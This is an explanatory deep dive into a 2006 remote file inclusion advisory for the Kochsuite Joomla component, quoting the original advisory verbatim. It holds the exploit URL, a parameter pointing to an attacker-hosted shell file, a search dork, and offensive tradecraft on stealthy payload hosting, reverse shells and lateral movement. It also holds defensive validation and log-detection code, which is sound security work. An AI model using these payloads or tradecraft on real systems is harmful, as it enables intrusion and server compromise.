Understanding Joomla! Kochsuite RFI: A Historical Exploit Deep Dive

What this paper is
This paper, published in 2006, details a Remote File Inclusion (RFI) vulnerability in Kochsuite, a component for the Joomla! CMS (then Mambo/Joomla), specifically version 0.9.4. The vulnerability allows an attacker to include and execute arbitrary PHP code from a remote server by supplying a URL in a configuration variable that the component passes straight to require_once.
Simple technical breakdown
The Kochsuite component, when processing its configuration, incorrectly handles a variable named mosConfig_absolute_path. Instead of ensuring this path is a local directory on the server, it uses it directly in a require_once statement. If an attacker can control mosConfig_absolute_path and point it at a URL on a server they control, they can make the Joomla! site fetch and execute a PHP file from that remote server. This effectively allows arbitrary code execution on the vulnerable Joomla! server.
Complete code and payload walkthrough
The provided exploit paper does not contain executable code or shellcode in the traditional sense. Instead, it describes the vulnerable code snippet and shows how to craft a URL to trigger the vulnerability.
Here's a breakdown of the relevant parts from the paper:
Vulnerable Code Snippet (Lines 46-47 of config.kochsuite.php, as quoted in the advisory):

    # Don't allow direct linking defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
    require_once ($mosConfig_absolute_path.'/administrator/components/com_kochsuite/includes/letters.inc');

- defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );: This is the standard Joomla! guard against direct access to component files. It checks whether the constant _VALID_MOS is defined, which the Joomla! core does when it loads a component legitimately; if it is not defined, the script exits. In the line quoted above, however, the check follows the "# Don't allow direct linking" comment on the same line, so PHP treats the whole of line 46 as a comment and the guard never runs. That is why the advisory's fix is simply to restore line 46 without the comment marker.
- require_once ($mosConfig_absolute_path.'/administrator/components/com_kochsuite/includes/letters.inc');: This is the core of the vulnerability. It includes a file whose location is built from $mosConfig_absolute_path.
- $mosConfig_absolute_path: This variable is supposed to hold the absolute path to the Joomla! installation's root directory. In this vulnerable version it is used without any validation, and because the script can be reached directly, its value can come from the request (in PHP of that era via the register_globals setting, which the paper does not name).
- The code concatenates this path with a relative path to a file named letters.inc.
Exploit URL Structure:

    http://[sitepath]/[joomlapath]/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://huh?

- http://[sitepath]/[joomlapath]/administrator/components/com_kochsuite/config.kochsuite.php: The URL of the vulnerable script within the Kochsuite component, requested directly rather than through the Joomla! core.
- ?mosConfig_absolute_path=http://huh?: The crucial part. The parameter mosConfig_absolute_path is passed to the config.kochsuite.php script, and http://huh? is the attacker-controlled value (in the paper only a harmless probe, showing that the include target becomes a URL). When the script processes the request, $mosConfig_absolute_path takes the value http://huh?.
- The require_once statement then becomes: require_once ('http://huh?/administrator/components/com_kochsuite/includes/letters.inc');
- PHP's require_once, when given a URL (starting with http:// or https://), attempts to fetch the content from that URL and execute it as PHP code if the allow_url_fopen directive is enabled in the server's PHP configuration. (Since PHP 5.2.0, a separate directive, allow_url_include, which defaults to Off, must also be enabled before include and require accept URLs; the 2006 paper predates that change.)
Mapping of Code Fragment/Block to Practical Purpose:
- defined( '_VALID_MOS' ) or die(...): Security check meant to block direct access to config.kochsuite.php; as quoted in the advisory it sits on the commented-out line 46, so direct URL access is not stopped.
- require_once ($mosConfig_absolute_path.'/administrator/components/com_kochsuite/includes/letters.inc');: The vulnerable function call that leads to RFI.
- $mosConfig_absolute_path: The input variable that is not validated, allowing remote URLs.
- mosConfig_absolute_path=http://attacker.com/shell.txt: The crafted URL parameter that exploits the vulnerability.
Payload Execution Stages (Conceptual):
- Initial Request: The attacker sends a crafted HTTP GET request to the vulnerable Joomla! site.
- Parameter Injection: The mosConfig_absolute_path parameter is set to a URL pointing to an attacker-controlled server.
- Remote File Fetch: The vulnerable config.kochsuite.php script, due to the missing validation and allow_url_fopen being enabled, attempts to require_once the remote URL.
- Code Execution: If the remote URL points to a file containing PHP code (e.g., shell.txt), PHP on the victim server fetches this file and executes it.
- Shell Access/Action: The executed remote code can then perform actions on the victim server, such as establishing a reverse shell, downloading further malware, or exfiltrating data.
Note on "Payload Bytes": This exploit relies on the PHP allow_url_fopen setting and the require_once function's behavior with URLs. There are no specific shellcode bytes provided in the paper itself, as the "payload" is the content of a remote PHP file.
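As an added illustration (not code from the paper or from the Kochsuite component), the following Python models the path construction the paper describes and the validation the component lacked: the configured root must be a plain absolute filesystem path with no URL scheme or stream wrapper, and it must still lie inside the real install root after normalisation. The helper names and the sample root /var/www/joomla are assumptions.

```python
"""Model of the Kochsuite include-path construction and the validation it lacked.

Added example; not code from the paper or from the Kochsuite component.
The helper names and the sample install root are assumptions.
"""
import posixpath
import re

# Relative path the component appends to the configured root (from the paper).
LETTERS_INC = "/administrator/components/com_kochsuite/includes/letters.inc"

# Anything that starts with a URL scheme or PHP stream wrapper (http://, ftp://,
# php://, data:, ...) must never reach require_once.
_SCHEME_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*:")


def build_include_path(config_root: str) -> str:
    """Reproduce what the vulnerable line computes: plain string concatenation."""
    return config_root + LETTERS_INC


def validate_install_root(config_root: str, allowed_root: str) -> str:
    """Return a normalised install root or raise ValueError.

    Rejects URL schemes and stream wrappers, relative paths, embedded NUL
    bytes, and any path that escapes allowed_root after normalisation.
    """
    if "\x00" in config_root:
        raise ValueError("NUL byte in path")
    if _SCHEME_RE.match(config_root):
        raise ValueError("URL scheme or stream wrapper not allowed: %r" % config_root)
    if not config_root.startswith("/"):
        raise ValueError("install root must be an absolute path: %r" % config_root)
    normalised = posixpath.normpath(config_root)
    allowed = posixpath.normpath(allowed_root)
    # Either exactly the allowed root or a descendant of it; ".." segments have
    # already been collapsed by normpath, so "/root/../../etc" ends up as "/etc".
    if normalised != allowed and not normalised.startswith(allowed.rstrip("/") + "/"):
        raise ValueError("path escapes allowed root: %r" % config_root)
    return normalised


def safe_include_path(config_root: str, allowed_root: str) -> str:
    """Validated equivalent of build_include_path()."""
    return build_include_path(validate_install_root(config_root, allowed_root))


def classify(config_root: str, allowed_root: str = "/var/www/joomla") -> str:
    """Return 'ok' or the rejection reason, for quick inspection of candidate values."""
    try:
        safe_include_path(config_root, allowed_root)
        return "ok"
    except ValueError as exc:
        return str(exc)


if __name__ == "__main__":
    # Constructed sample values: the paper's probe value plus a few typical variants.
    for value in ("http://huh?", "/var/www/joomla", "php://input",
                  "../../etc", "/var/www/joomla/../../../etc"):
        print("%-32s -> %s" % (value, build_include_path(value)))
        print("%-32s    validation: %s" % ("", classify(value)))
```

Running the block shows that the paper's probe value yields the URL-backed include target the walkthrough describes, while the validator rejects it before any include would run; in the real component the equivalent fix is to derive the install root from a server-side constant rather than from anything the request can influence.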
Practical details for offensive operations teams
- Required Access Level: Unauthenticated access to the target web application.
- Lab Preconditions:
  - A target Joomla! installation with the Kochsuite component (version 0.9.4 or a similarly vulnerable version) installed.
  - The allow_url_fopen directive must be enabled in the target server's PHP configuration. This is a common default but can be disabled by security-conscious administrators.
  - An attacker-controlled web server capable of serving PHP files.
- Tooling Assumptions:
  - A web browser for manual testing, or a scripting language (like Python with requests, or curl) for automation.
  - A simple web server (e.g., Python's http.server, Apache, Nginx) to host the malicious PHP payload.
- Execution Pitfalls:
  - allow_url_fopen disabled: If this PHP directive is off, the RFI will not work. The attacker would need to look for alternative vulnerabilities or methods to achieve code execution.
  - Firewall/WAF blocking: Network firewalls or Web Application Firewalls (WAFs) might block requests to external URLs or detect the RFI pattern.
  - Incorrect mosConfig_absolute_path handling: Later versions of Joomla! or the Kochsuite component might have patched this specific vulnerability, or the require_once might be guarded by stricter checks.
  - Payload not being PHP: If the attacker points to a non-PHP file, its contents will likely be fetched and displayed (or ignored) but not executed as code.
  - URL encoding issues: Special characters in the attacker's domain or payload path might need URL encoding.
- Tradecraft Considerations:
  - Reconnaissance: Identify the target CMS (Joomla!) and look for the com_kochsuite component. The dork inurl:"com_kochsuite" provided in the paper is a good starting point for search engines.
  - Payload Hosting: Host a simple PHP reverse shell or a file containing commands like phpinfo(); on a reliable server.
  - Stealth: Initial RFI attempts might be logged. Consider using a disposable IP or a compromised server for hosting the payload initially.
  - Post-Exploitation: Once code execution is achieved, the immediate goal is often to establish a more stable shell (e.g., reverse shell) and then escalate privileges or move laterally.
Where this was used and when
This vulnerability was published in August 2006. It targets version 0.9.4 of the Kochsuite component on the Mambo/Joomla! installations of that era. At the time, Joomla! was a popular CMS, and vulnerabilities in its components were frequently exploited. This type of RFI was a common attack vector against PHP-based web applications in the mid-2000s. It is unlikely this specific version of Kochsuite is still in widespread use, but the RFI technique was prevalent and has been seen in various forms across many web applications.
Defensive lessons for modern teams
- Input Validation is Paramount: Never trust user-supplied input, especially when it's used in file operations or dynamic code execution. Always validate and sanitize all external inputs.
- Disable allow_url_fopen and allow_url_include: These PHP directives are often unnecessary for legitimate application functionality and pose significant security risks. Disabling them is a critical hardening step (allow_url_include has defaulted to Off since PHP 5.2.0; allow_url_fopen still defaults to On and should be switched off unless the application genuinely fetches remote resources through the file functions).
- Keep Software Updated: Regularly update CMS core, themes, and all installed components/plugins. Vendors patch these vulnerabilities, and running outdated software is a primary attack vector.
- Web Application Firewalls (WAFs): Deploy and properly configure WAFs to detect and block common attack patterns like RFI, SQLi, and XSS.
- Secure Configuration: Review PHP configurations and server settings for security best practices.
- Least Privilege: Ensure web server processes run with the minimum necessary privileges.
- Monitoring and Logging: Implement robust logging for web server access and PHP errors. Monitor these logs for suspicious activity, such as requests to external resources or unusual file inclusions.
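To make the monitoring lesson concrete, here is an added Python example (not from the paper) that scans web server access logs in the common "combined" format and flags any request whose query-string parameter, after percent-decoding, carries a URL scheme or PHP stream wrapper, the pattern this RFI leaves behind. The log lines are constructed for the demonstration and use documentation IP ranges; the regex for the log format and the helper names are assumptions.

```python
"""Flag remote-file-inclusion attempts in web server access logs.

Added example; not part of the paper. Log lines are constructed for the
demonstration; the log format is Apache/Nginx 'combined', parsed with a regex.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format: host ident user [time] "METHOD target HTTP/x" status bytes "ref" "ua"
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# A parameter value that starts with a URL scheme (http://, ftp://, ...) or a
# PHP stream wrapper (php:, data:) should never appear in a path parameter.
_REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*://|php:|data:)", re.I)

# Constructed sample lines: the paper's probe URL shape, a percent-encoded
# variant, a legitimate component request, and a local-path value (no alert).
SAMPLE_LOG = """\
203.0.113.7 - - [18/Aug/2006:10:12:01 +0000] "GET /joomla/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://huh? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Aug/2006:10:12:05 +0000] "GET /joomla/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http%3A%2F%2F192.0.2.10%2Fx.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.2 - - [18/Aug/2006:10:13:00 +0000] "GET /joomla/index.php?option=com_kochsuite&Itemid=5 HTTP/1.1" 200 8043 "-" "Mozilla/5.0"
198.51.100.9 - - [18/Aug/2006:10:14:30 +0000] "GET /joomla/index.php?redirect=/var/www/joomla HTTP/1.1" 302 0 "-" "curl/7.15"
"""


def parse_line(line):
    """Return a dict of fields for a combined-format line, or None if it does not match."""
    m = _LOG_RE.match(line)
    return m.groupdict() if m else None


def remote_params(target):
    """Yield (name, decoded value) for query parameters whose value points at a URL/stream."""
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl percent-decodes once; decode again to catch double encoding.
        decoded = unquote(value)
        if _REMOTE_RE.match(decoded):
            yield name, decoded


def detect_rfi(log_text):
    """Return one finding per request that carries a remote-looking parameter value."""
    findings = []
    for line in log_text.splitlines():
        fields = parse_line(line)
        if not fields:
            continue
        for name, value in remote_params(fields["target"]):
            findings.append({
                "ip": fields["ip"],
                "time": fields["time"],
                "path": urlsplit(fields["target"]).path,
                "param": name,
                "value": value,
                "status": int(fields["status"]),
            })
    return findings


if __name__ == "__main__":
    for f in detect_rfi(SAMPLE_LOG):
        print("%(ip)s %(time)s %(path)s %(param)s=%(value)s (HTTP %(status)d)" % f)
```

On the constructed sample the scan reports the two requests against config.kochsuite.php and ignores the legitimate component request and the local-path value. Pairing such findings with the server's outbound connection logs (the fetch of the remote file happens from the web server itself) gives a second, independent indicator of the same event.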
ASCII visual

+-----------------+      +-----------------------+      +---------------------+
| Attacker Server |----->| Target Joomla! Server |----->| Vulnerable Component|
| (Payload Host)  |      | (Victim)              |      | (Kochsuite)         |
+-----------------+      +-----------+-----------+      +---------------------+
        ^                            |
        |                            | HTTP request with
        |                            | mosConfig_absolute_path=http://attacker.com/shell.php
        |                            v
        |                 +---------------------+
        |                 |   PHP Interpreter   |
        |                 | (allow_url_fopen=On)|
        |                 +----------+----------+
        |                            | require_once() fetches and executes
        |                            | remote PHP code
        +----------------------------+

This diagram illustrates the flow: the attacker's server hosts the malicious PHP file. The attacker sends a request to the vulnerable Joomla! server, tricking the Kochsuite component into fetching and executing the PHP code from the attacker's server via the require_once function.
Source references
- Paper: Joomla! Component Kochsuite 0.9.4 - Remote File Inclusion
- Author: camino
- Published: 2006-08-18
- Exploit-DB URL: https://www.exploit-db.com/papers/2215
Original Exploit-DB Content (Verbatim)
.:[ insecurity research team ]:.
.__..____.:.______.____.:.____ .
.:. | |/ \:/ ___// __ \:/ _\.:.
: | | | \\____\\ ___/\ /__ :. .
..: |__|___| /____ >\___ >\___ >.:
.:.. .. .\/ .:\/:. .\/. .:\/:
. ...:. .advisory. .:...
:..................: 18.o8.2oo6 ..
Affected Application: Kochsuite v0.9.4
(Mambo/Joomla CMS Component)
. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
Discoverd by: camino
Team: Insecurity Research Team
URL: http://www.insecurityresearch.org
E-Mail: camino[at]sexmagnet[dot]com
. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
Typ: Remote [x] Local [ ]
Remote File Inclusion [x] SQL Injection [ ]
Level: Low [ ] Middle [x] High [ ]
Application: Kochsuite
Version: 0.9.4
Vulnerable File: config.kochsuite.php
URL: http://www.vegisto.com
Description: It's a component for chiefs to publish theirs stuff...
Dork: inurl:"com_kochsuite"
. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
http://[sitepath]/[joomlapath]/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://huh?
. . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .
o1.) open config.kochsuite.php
o2.) take a look at line 46:
# Don't allow direct linking defined( '_VALID_MOS' ) or
die( 'Direct Access to this location is not allowed.' );
o3.) take a look at line 47:
require_once ($mosConfig_absolute_path.'/administrator/
components/com_kochsuite/includes/letters.inc');
o4.) change line 46:
defined( '_VALID_MOS' ) or
die( 'Direct Access to this location is not allowed.' );
. . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .
my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members of insecurity research team ;-)
# milw0rm.com [2006-08-18]